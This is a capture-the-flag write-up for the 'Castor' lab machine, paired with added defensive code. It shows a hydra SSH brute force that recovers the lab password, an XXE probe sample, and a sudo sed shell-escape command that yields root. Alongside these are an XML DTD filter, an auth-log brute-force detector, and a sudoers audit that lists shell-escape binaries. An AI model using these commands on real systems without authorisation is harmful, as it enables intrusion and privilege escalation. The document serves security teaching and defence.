Castor

image

Target machine: https://labs.thehackerslabs.com/machine/165

192.168.100.24

Information gathering

Port scan

root@LAPTOP-O235O5EH [~] ➜  rustscan -a 192.168.100.24                                                       [12:47:22]
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I scanned my computer so many times, it thinks we're dating.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.24:22
Open 192.168.100.24:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-21 12:47 CST
Initiating ARP Ping Scan at 12:47
Scanning 192.168.100.24 [1 port]
Completed ARP Ping Scan at 12:47, 1.43s elapsed (1 total hosts)
Nmap scan report for 192.168.100.24 [host down, received no-response]
Read data files from: /usr/share/nmap
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 1.49 seconds
Raw packets sent: 2 (56B) | Rcvd: 0 (0B)

Directory scan on 80/tcp

root@LAPTOP-O235O5EH [~] ➜  dirsearch -u http://192.168.100.24                                               [13:13:32]
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_192.168.100.24/_26-01-21_13-13-40.txt

Target: http://192.168.100.24/

[13:13:40] Starting:
[13:13:40] 301 - 313B - /js -> http://192.168.100.24/js/
[13:13:42] 403 - 279B - /.htaccess.bak1
[13:13:42] 403 - 279B - /.htaccess.sample
[13:13:42] 403 - 279B - /.htaccess.save
[13:13:42] 403 - 279B - /.htaccess_extra
[13:13:42] 403 - 279B - /.htaccess_orig
[13:13:42] 403 - 279B - /.htaccessBAK
[13:13:42] 403 - 279B - /.htaccess_sc
[13:13:42] 403 - 279B - /.htaccessOLD
[13:13:42] 403 - 279B - /.htaccessOLD2
[13:13:42] 403 - 279B - /.htm
[13:13:42] 403 - 279B - /.html
[13:13:42] 403 - 279B - /.htaccess.orig
[13:13:42] 403 - 279B - /.htpasswds
[13:13:42] 403 - 279B - /.httr-oauth
[13:13:42] 403 - 279B - /.htpasswd_test
[13:13:42] 403 - 279B - /.ht_wsr.txt
[13:13:43] 403 - 279B - /.php
[13:13:49] 403 - 279B - /cgi-bin/
[13:13:51] 301 - 314B - /css -> http://192.168.100.24/css/
[13:13:58] 200 - 451B - /js/
[13:14:03] 403 - 279B - /server-status/
[13:14:03] 403 - 279B - /server-status
[13:14:05] 301 - 318B - /uploads -> http://192.168.100.24/uploads/
[13:14:05] 200 - 16B - /upload.php
[13:14:05] 200 - 407B - /uploads/

Task Completed

castorcin shell

/upload.php responds with "xml not provided"

Upload an XXE payload and see what comes back.

image

As you can see, it is indeed XXE injection.
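The upload endpoint above parses attacker-supplied XML with entity processing enabled, which is what makes XXE possible. The following is an added example (not code from the writeup or from the lab's /upload.php) of the standard mitigation: refuse any document that declares a DTD before it ever reaches the parser. The `upload_handler` endpoint, its messages and the sample documents are constructed for this demonstration.

```python
"""Added example (not from the original writeup): reject XML uploads that
carry a DTD before handing them to a parser, the standard mitigation for XXE.
The handler and the sample documents below are constructed for this demo."""
import re
import xml.etree.ElementTree as ET

# A DOCTYPE (and with it any <!ENTITY ...> declaration) has no legitimate use
# in a simple upload API, so the safest policy is to refuse it outright rather
# than trying to decide which entity declarations are harmless.
_DTD_RE = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


class XmlUploadRejected(ValueError):
    """Raised when an uploaded document declares a DTD."""


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse an uploaded XML body, refusing any document that declares a DTD."""
    if _DTD_RE.search(data):
        raise XmlUploadRejected("DTD / entity declarations are not allowed")
    return ET.fromstring(data)


def upload_handler(body: bytes) -> dict:
    """Hypothetical upload endpoint (constructed, not the lab's /upload.php)."""
    if not body:
        return {"status": 400, "message": "xml not provided"}
    try:
        root = parse_untrusted_xml(body)
    except XmlUploadRejected as exc:
        return {"status": 400, "message": str(exc)}
    except ET.ParseError:
        return {"status": 400, "message": "malformed xml"}
    return {"status": 200,
            "message": f"received <{root.tag}> with {len(root)} child element(s)"}


# Constructed sample inputs: one ordinary document, one carrying a DTD that
# declares an external entity (the shape an XXE probe takes).
SAFE_DOC = b"<?xml version='1.0'?><data><name>castor</name><size>42</size></data>"
DTD_DOC = (b"<?xml version='1.0'?>"
           b"<!DOCTYPE data [<!ENTITY ext SYSTEM 'file:///example'>]>"
           b"<data><name>&ext;</name></data>")

if __name__ == "__main__":
    for doc in (b"", SAFE_DOC, DTD_DOC, b"<data>"):
        print(upload_handler(doc))
```

Rejecting the DTD up front is parser-independent, which matters because the default behaviour of XML libraries varies (libxml2-based parsers such as PHP's resolve external entities unless told not to). In Python the `defusedxml` package implements the same policy inside the parser and is the usual production choice; the regex pre-check here is deliberately kept self-contained.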

castorcin is the only user, so try brute-forcing the password with hydra.

hydra -l castorcin -P /usr/share/wordlists/rockyou.txt 192.168.100.24 ssh -t 4 -vV

image

castorcin:chocolate
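A hydra run like the one above leaves a very loud trail in sshd's auth log: a burst of "Failed password" lines from one source, often followed by an "Accepted password" line once the wordlist hits. The following is an added example (not from the writeup) of detection logic that groups failures per source IP and flags a later successful password login from the same IP. The log lines are constructed for this demonstration; the attacker address 10.0.0.9 is a placeholder.

```python
"""Added example (not from the original writeup): flag SSH password brute
forcing from sshd auth-log lines and note whether it ended in a successful
login. The log lines are constructed for this demonstration."""
import re
from collections import defaultdict

# Typical OpenSSH lines as written via syslog on Debian-style hosts.
FAILED_RE = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")
ACCEPTED_RE = re.compile(
    r"Accepted password for (?P<user>\S+) from (?P<ip>\S+) port \d+")


def analyze_auth_log(lines, threshold=5):
    """Return {ip: {...}} for every source IP with >= threshold failed
    password attempts, recording the usernames tried and whether a later
    password login from that IP succeeded."""
    stats = defaultdict(lambda: {"failures": 0, "users": set(), "succeeded_as": None})
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            entry = stats[m["ip"]]
            entry["failures"] += 1
            entry["users"].add(m["user"])
            continue
        m = ACCEPTED_RE.search(line)
        # Only a success that follows failures from the same IP is interesting.
        if m and m["ip"] in stats:
            stats[m["ip"]]["succeeded_as"] = m["user"]
    return {ip: s for ip, s in stats.items() if s["failures"] >= threshold}


def describe(findings):
    """Render findings as one alert line per source IP."""
    out = []
    for ip, s in sorted(findings.items()):
        msg = f"{ip}: {s['failures']} failed password attempts against {sorted(s['users'])}"
        if s["succeeded_as"]:
            msg += f"; LATER SUCCESS as {s['succeeded_as']} (treat credential as compromised)"
        out.append(msg)
    return out


# Constructed sample: a short brute-force burst that ends in a successful
# password login, plus one unrelated typo-and-retry from another host.
SAMPLE_LOG = [
    "Jan 21 13:20:01 TheHackersLabs-Castor sshd[1201]: Failed password for castorcin from 10.0.0.9 port 51000 ssh2",
    "Jan 21 13:20:01 TheHackersLabs-Castor sshd[1202]: Failed password for castorcin from 10.0.0.9 port 51001 ssh2",
    "Jan 21 13:20:02 TheHackersLabs-Castor sshd[1203]: Failed password for invalid user admin from 10.0.0.9 port 51002 ssh2",
    "Jan 21 13:20:02 TheHackersLabs-Castor sshd[1204]: Failed password for castorcin from 10.0.0.9 port 51003 ssh2",
    "Jan 21 13:20:03 TheHackersLabs-Castor sshd[1205]: Failed password for castorcin from 10.0.0.9 port 51004 ssh2",
    "Jan 21 13:20:03 TheHackersLabs-Castor sshd[1206]: Failed password for castorcin from 10.0.0.9 port 51005 ssh2",
    "Jan 21 13:20:04 TheHackersLabs-Castor sshd[1207]: Accepted password for castorcin from 10.0.0.9 port 51006 ssh2",
    "Jan 21 13:25:10 TheHackersLabs-Castor sshd[1300]: Failed password for castorcin from 192.168.100.7 port 40100 ssh2",
    "Jan 21 13:25:15 TheHackersLabs-Castor sshd[1301]: Accepted publickey for castorcin from 192.168.100.7 port 40101 ssh2",
]

if __name__ == "__main__":
    for line in describe(analyze_auth_log(SAMPLE_LOG)):
        print(line)
```

The threshold is deliberately low because a dictionary attack produces hundreds of failures per minute; what actually stops this class of attack on the host is key-only authentication (`PasswordAuthentication no`) and a rate limiter such as fail2ban, with the log check serving as the alert that a weak password like the one recovered here has been guessed.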

Privilege escalation

castorcin -> root

castorcin@TheHackersLabs-Castor:~$ sudo -l
sudo: unable to resolve host TheHackersLabs-Castor: Nombre o servicio desconocido
Matching Defaults entries for castorcin on TheHackersLabs-Castor:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User castorcin may run the following commands on TheHackersLabs-Castor:
(ALL : ALL) NOPASSWD: /usr/bin/sed

/usr/bin/sed can be run with sudo without a password.

GTFOBins has a ready-made privilege escalation method for it: https://gtfobins.org/gtfobins/sed/

image

sudo  /usr/bin/sed -n '1e exec /bin/sh 1>&0' /etc/hosts

image
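The root cause here is a sudoers rule that lets an unprivileged user run, without a password, a binary that can execute arbitrary commands. The following is an added example (not from the writeup) of an audit that parses `sudo -l` output and flags rules of that shape. The first sample is the writeup's own `sudo -l` listing; the second sample and the list of binaries with known sudo shell escapes are constructed and deliberately short (a real audit would load the full GTFOBins catalogue).

```python
"""Added example (not from the original writeup): audit `sudo -l` output for
rules on binaries that can spawn a shell or read/write arbitrary files.
The binary list is an illustrative subset of what GTFOBins documents."""
import os
import re

# Illustrative subset (constructed for this demo) of binaries with documented
# sudo shell escapes. Load the full GTFOBins list for real use.
SHELL_ESCAPE_BINARIES = {
    "sed", "vim", "vi", "awk", "find", "less", "more", "nano",
    "env", "perl", "python3", "tar",
}

# One sudoers rule line as printed by `sudo -l`: "(runas) TAG: cmd, cmd".
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return a list of {runas, tags, command} dicts for every command rule
    after the 'may run the following commands' header."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip(" :") for t in m["tags"].split() if t.strip(" :")}
        for cmd in m["cmds"].split(","):
            cmd = cmd.strip()
            if cmd:
                rules.append({"runas": m["runas"], "tags": tags, "command": cmd})
    return rules


def audit_sudo_rules(text):
    """Flag rules that grant ALL or a known shell-escape binary; NOPASSWD
    raises the severity because no second factor stands in the way."""
    findings = []
    for rule in parse_sudo_l(text):
        binary = os.path.basename(rule["command"].split()[0])
        if rule["command"] == "ALL" or binary in SHELL_ESCAPE_BINARIES:
            nopasswd = "NOPASSWD" in rule["tags"]
            findings.append({
                "command": rule["command"], "binary": binary,
                "runas": rule["runas"], "nopasswd": nopasswd,
                "severity": "high" if nopasswd else "medium",
            })
    return findings


# Sample 1: the writeup's own `sudo -l` output for castorcin.
CASTOR_SUDO_L = """\
Matching Defaults entries for castorcin on TheHackersLabs-Castor:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin, use_pty

User castorcin may run the following commands on TheHackersLabs-Castor:
    (ALL : ALL) NOPASSWD: /usr/bin/sed
"""

# Sample 2 (constructed): a wrapper script that is not flagged, plus an
# editor that is flagged at lower severity because a password is required.
OTHER_SUDO_L = """\
User alice may run the following commands on host1:
    (root) NOPASSWD: /usr/local/bin/backup.sh
    (root) /usr/bin/vim
"""

if __name__ == "__main__":
    for sample in (CASTOR_SUDO_L, OTHER_SUDO_L):
        for f in audit_sudo_rules(sample):
            print(f"[{f['severity']}] {f['command']} as ({f['runas']})"
                  f"{' NOPASSWD' if f['nopasswd'] else ''}")
```

The fix for the Castor rule is to remove it: if castorcin genuinely needs to edit one file as root, the rule should point at a wrapper script with fixed arguments rather than at sed itself, because sudoers argument restrictions on a general-purpose tool like sed are easy to get wrong and GTFOBins documents exactly how such tools escape to a shell.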